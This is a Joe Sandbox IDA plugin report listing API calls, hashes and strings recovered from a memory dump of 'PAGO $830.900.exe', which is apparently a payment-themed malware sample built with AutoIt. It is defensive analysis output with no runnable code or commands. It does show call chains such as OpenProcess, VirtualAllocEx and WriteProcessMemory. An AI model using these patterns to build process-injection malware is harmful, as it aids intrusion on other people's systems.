                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 667ba873a9d5db9e91c2befc64c4a343639673a923eaa08ffce1f31dbca127b6
                                                          • Instruction ID: 3e1111363de190c28107ed61730f8a6b2dfc01ce63d92bced549886e5d88cfa9
                                                          • Opcode Fuzzy Hash: 667ba873a9d5db9e91c2befc64c4a343639673a923eaa08ffce1f31dbca127b6
                                                          • Instruction Fuzzy Hash: EB01B1736122157F6B211B7B5C88C7B6D6DDAC3B703281239B905E6200DA618C0181B0
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D8AB19
                                                          • SelectObject.GDI32(?,00000000), ref: 00D8AB28
                                                          • BeginPath.GDI32(?), ref: 00D8AB3F
                                                          • SelectObject.GDI32(?,00000000), ref: 00D8AB68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 6bdbca2960b04e5be46d7c79cb151b75854fe5671803a3a2b0796d92bd94526b
                                                          • Instruction ID: 25b3429d3a4d960f84d099ed47855661f8ec9a7731bfcf4c1d22d962f6061b2c
                                                          • Opcode Fuzzy Hash: 6bdbca2960b04e5be46d7c79cb151b75854fe5671803a3a2b0796d92bd94526b
                                                          • Instruction Fuzzy Hash: 03218034802305EFEF11AF6AED14BA97BB5FB82351F144256F551B60A0D37098DACBA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 53d75b53aaa94b01157eea90ca15df5111717dc5c17481f98ccdc30bf42e4415
                                                          • Instruction ID: dbd395c2ac844be317138cbb336520b2de2b8ff5e2e902b02930569af68e2d22
                                                          • Opcode Fuzzy Hash: 53d75b53aaa94b01157eea90ca15df5111717dc5c17481f98ccdc30bf42e4415
                                                          • Instruction Fuzzy Hash: 6001D876705A0A7BE714A610AC82FAB736CEF20398F544432FD05A6789EB51ED2086F5
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00D9F26E,00DA37F3,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C), ref: 00DA2D8D
                                                          • _free.LIBCMT ref: 00DA2DC2
                                                          • _free.LIBCMT ref: 00DA2DE9
                                                          • SetLastError.KERNEL32(00000000), ref: 00DA2DF6
                                                          • SetLastError.KERNEL32(00000000), ref: 00DA2DFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: c72915bbe623d0b5ad1381a968135068adc270f82739f4f7738bfbfe719b6ba9
                                                          • Instruction ID: fb6e0d16abcc74e53f91eecbb52c292e5fbb3f7d025bb1a3777a907a80085361
                                                          • Opcode Fuzzy Hash: c72915bbe623d0b5ad1381a968135068adc270f82739f4f7738bfbfe719b6ba9
                                                          • Instruction Fuzzy Hash: A60128326426017BCA22273F6C8AD3B166EEBC3771B344524F419B2183EE34CC4A52B0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE8B5
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00DDE8C3
                                                          • Sleep.KERNEL32(00000000), ref: 00DDE8CB
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE8D5
                                                          • Sleep.KERNEL32 ref: 00DDE911
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1064
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1073
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD107A
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD1091
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0F0E
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0F1A
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0F29
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DD0F30
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD0F46
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD0F6E
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F7A
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F89
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F90
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0FA6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0242
• CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE024F
• CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE025C
• CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0269
• CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0276
• CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0283
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• _free.LIBCMT ref: 00DAD6F2
  • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
  • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
• _free.LIBCMT ref: 00DAD704
• _free.LIBCMT ref: 00DAD716
• _free.LIBCMT ref: 00DAD728
• _free.LIBCMT ref: 00DAD73A
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00DD5BAE
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00DD5BC5
• MessageBeep.USER32(00000000), ref: 00DD5BDD
• KillTimer.USER32(?,0000040A), ref: 00DD5BF9
• EndDialog.USER32(?,00000001), ref: 00DD5C13
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• _free.LIBCMT ref: 00DA224E
  • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
  • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
• _free.LIBCMT ref: 00DA2260
• _free.LIBCMT ref: 00DA2273
• _free.LIBCMT ref: 00DA2284
• _free.LIBCMT ref: 00DA2295
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• EndPath.GDI32(?), ref: 00D8AA5A
• StrokeAndFillPath.GDI32(?,?,00DC7BB4,00000000,?,?,?), ref: 00D8AA76
• SelectObject.GDI32(?,00000000), ref: 00D8AA89
• DeleteObject.GDI32 ref: 00D8AA9C
• StrokePath.GDI32(?), ref: 00D8AAB7
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
Strings
Similarity
• API ID: __freea$_free
• String ID: a/p$am/pm
• API String ID: 3432400110-3206640213
APIs
  • Part of subcall function 00D901C2: EnterCriticalSection.KERNEL32(00E4070C,?,?,?,00D81744,00E42580,?,?,?), ref: 00D901CD
  • Part of subcall function 00D901C2: LeaveCriticalSection.KERNEL32(00E4070C,?,00D81744,00E42580,?,?,?), ref: 00D9020A
  • Part of subcall function 00D90023: __onexit.LIBCMT ref: 00D90029
• __Init_thread_footer.LIBCMT ref: 00DF615F
  • Part of subcall function 00D90178: EnterCriticalSection.KERNEL32(00E4070C,?,?,00DC556E,00E42540,?,?,?,?,?), ref: 00D90182
  • Part of subcall function 00D90178: LeaveCriticalSection.KERNEL32(00E4070C,?,00DC556E,00E42540,?,?,?,?,?), ref: 00D901B5
  • Part of subcall function 00DE34BA: LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE3502
  • Part of subcall function 00DE34BA: LoadStringW.USER32(?,?,00000FFF,?), ref: 00DE3528
Strings
Similarity
• API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
• String ID: x#$x#$x#
• API String ID: 1072379062-1894725482
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: 3$A$_
• API String ID: 176396367-1956071190
APIs
  • Part of subcall function 00DDB321: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD2114,?,?,00000034,00000800,?,00000034), ref: 00DDB34B
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DD26A4
  • Part of subcall function 00DDB2EC: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD2143,?,?,00000800,?,00001073,00000000,?,?), ref: 00DDB316
  • Part of subcall function 00DDB248: GetWindowThreadProcessId.USER32(?,?), ref: 00DDB273
  • Part of subcall function 00DDB248: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DD20D8,00000034,?,?,00001004,00000000,00000000), ref: 00DDB283
  • Part of subcall function 00DDB248: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DD20D8,00000034,?,?,00001004,00000000,00000000), ref: 00DDB299
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD2711
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD275E
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAGO $830.900.exe,00000104), ref: 00DA16F9
• _free.LIBCMT ref: 00DA17C4
• _free.LIBCMT ref: 00DA17CE
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\PAGO $830.900.exe
• API String ID: 2506810119-2361314617
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DDC224
• DeleteMenu.USER32(?,00000007,00000000), ref: 00DDC26A
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E41990,013958F8), ref: 00DDC2B3
Strings
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0D0D0,00000000,?,?,?,?), ref: 00E043DF
• GetWindowLongW.USER32 ref: 00E043FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E0440C
Strings
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
APIs
  • Part of subcall function 00DF3282: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DF2F9E,?,?), ref: 00DF329F
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF2FA1
• _wcslen.LIBCMT ref: 00DF2FC2
• htons.WSOCK32(00000000,?,?,00000000), ref: 00DF302D
Strings
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E0463A
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E04648
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E0464F
Strings
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 176396367-2734436370
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E03773
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E03783
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E037A9
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00DE4926
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DE497A
• SetErrorMode.KERNEL32(00000000,?,?,00E0D0D0), ref: 00DE49EE
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E04184
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E04199
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E041A6
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
  • Part of subcall function 00DD2CEB: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2D09
  • Part of subcall function 00DD2CEB: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2D1A
  • Part of subcall function 00DD2CEB: GetCurrentThreadId.KERNEL32 ref: 00DD2D21
  • Part of subcall function 00DD2CEB: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2D28
• GetFocus.USER32 ref: 00DD2EBB
  • Part of subcall function 00DD2D32: GetParent.USER32(00000000), ref: 00DD2D3D
• GetClassNameW.USER32(?,?,00000100), ref: 00DD2F06
• EnumChildWindows.USER32(?,00DD2F7E), ref: 00DD2F2E
Strings
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                          • String ID: %s%d
                                                          • API String ID: 1272988791-1110647743
                                                          • Opcode ID: 886a6f6c6dd7be0eafac1e836c68c2839bce0dcc12880f2daf1eb4dbf0c6b992
                                                          • Instruction ID: f4d15e6b95e57e6f83cc80b2fcdb58566fcda20c98677fff2de23d82a388f2aa
                                                          • Opcode Fuzzy Hash: 886a6f6c6dd7be0eafac1e836c68c2839bce0dcc12880f2daf1eb4dbf0c6b992
                                                          • Instruction Fuzzy Hash: 7111A2756002056BCF147FB58C89AFE376AEF94314F04406AF909AB292DE7199899B70
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E057F6
                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E05823
                                                          • DrawMenuBar.USER32(?), ref: 00E05832
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$InfoItem$Draw
                                                          • String ID: 0
                                                          • API String ID: 3227129158-4108050209
                                                          • Opcode ID: e8705d3e221627f2c0650c111778263be016fd5912cfe284ab4b4fab27f81fd1
                                                          • Instruction ID: 8dc4e13960b34d4504246a441a9a6b1160fa97294796b5a9bec004e623de2be7
                                                          • Opcode Fuzzy Hash: e8705d3e221627f2c0650c111778263be016fd5912cfe284ab4b4fab27f81fd1
                                                          • Instruction Fuzzy Hash: B6016932600218AFDB209F51DC48BAB7BB8FB45354F10C0A9ED49E6191DB748AC4EF31
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInitInitializeUninitialize
                                                          • String ID:
                                                          • API String ID: 1998397398-0
                                                          • Opcode ID: b53f2438d7b363e32dc194b25e71ea11c62f3d0874494708e1cc014e49a37499
                                                          • Instruction ID: 761624ebc52d847cec69a1656fadab289b22d58ffbb19b8113571640fe767ff6
                                                          • Opcode Fuzzy Hash: b53f2438d7b363e32dc194b25e71ea11c62f3d0874494708e1cc014e49a37499
                                                          • Instruction Fuzzy Hash: 1AA138756042049FC700EF28C485A2AB7E5FF88714F0AC859FA899B362DB71ED45CB72
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E0FC24,?), ref: 00DD04D9
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E0FC24,?), ref: 00DD04F1
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00E0D108,000000FF,?,00000000,00000800,00000000,?,00E0FC24,?), ref: 00DD0516
                                                          • _memcmp.LIBVCRUNTIME ref: 00DD0537
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: d41c1304252aabb6eaeab838f2e4d9d2c48d61c69fa2254cb2230f8976135d7c
                                                          • Instruction ID: 88e726ba1a6c2df93b96d8c1bdcdbf3376a3b6da26ffb0064890bc5ba13fe2b4
                                                          • Opcode Fuzzy Hash: d41c1304252aabb6eaeab838f2e4d9d2c48d61c69fa2254cb2230f8976135d7c
                                                          • Instruction Fuzzy Hash: AB810A71A00109EFCB04DF94C984EEEBBB9FF89315F244559E506AB250DB71AE46CF60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 565a6ebcb0366cb5355bffbfb2f81e675be661ad93b8aa0be4f8fde709537a95
                                                          • Instruction ID: ea0f040ea862d6d460ba434beff8093d859a14a0cece96fbe1f3184c38c3f0b2
                                                          • Opcode Fuzzy Hash: 565a6ebcb0366cb5355bffbfb2f81e675be661ad93b8aa0be4f8fde709537a95
                                                          • Instruction Fuzzy Hash: EE417D39A00600EBDF206BFD8C55BFE3AB4FF42730F684225F41AD2291EA7489458271
                                                          APIs
                                                          • GetWindowRect.USER32(0139E8E8,?), ref: 00E061B0
                                                          • ScreenToClient.USER32(?,?), ref: 00E061E3
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E06250
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 8239c1982935c4071272a0dea204c243c67ae7865a50f22eb48e07a5e5b35a6d
                                                          • Instruction ID: 1a90699f456f489332109d122f4082c464195ed48ada235d2b68716545b8fa5a
                                                          • Opcode Fuzzy Hash: 8239c1982935c4071272a0dea204c243c67ae7865a50f22eb48e07a5e5b35a6d
                                                          • Instruction Fuzzy Hash: 8F516E74900209EFCF10DF68C880AAE7BB6FF95364F109159F955AB2A0D730AD91CB90
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00DF1A24
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1A32
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DF1AB1
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1ABB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$socket
                                                          • String ID:
                                                          • API String ID: 1881357543-0
                                                          • Opcode ID: 965559d78799aae621c2a6764ad11cce8e9626533c639aa4899dd28316e80919
                                                          • Instruction ID: 5edf3af9199ada8697e1060c7ba6dcdcfcd08e678d8052d47a978dcdf3676c63
                                                          • Opcode Fuzzy Hash: 965559d78799aae621c2a6764ad11cce8e9626533c639aa4899dd28316e80919
                                                          • Instruction Fuzzy Hash: 3C417039600200AFE720AF25C886F2677A5EF44714F58C458F6699F2D2D772ED428BB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f122ffccaf7409e934f14669a76bc8f4fd06486360a9547e08729cd0bf66d63a
                                                          • Instruction ID: 6a8d4d33f06962b09eaab42898233bc3ccb34570e2cc80d6711995671f7a569f
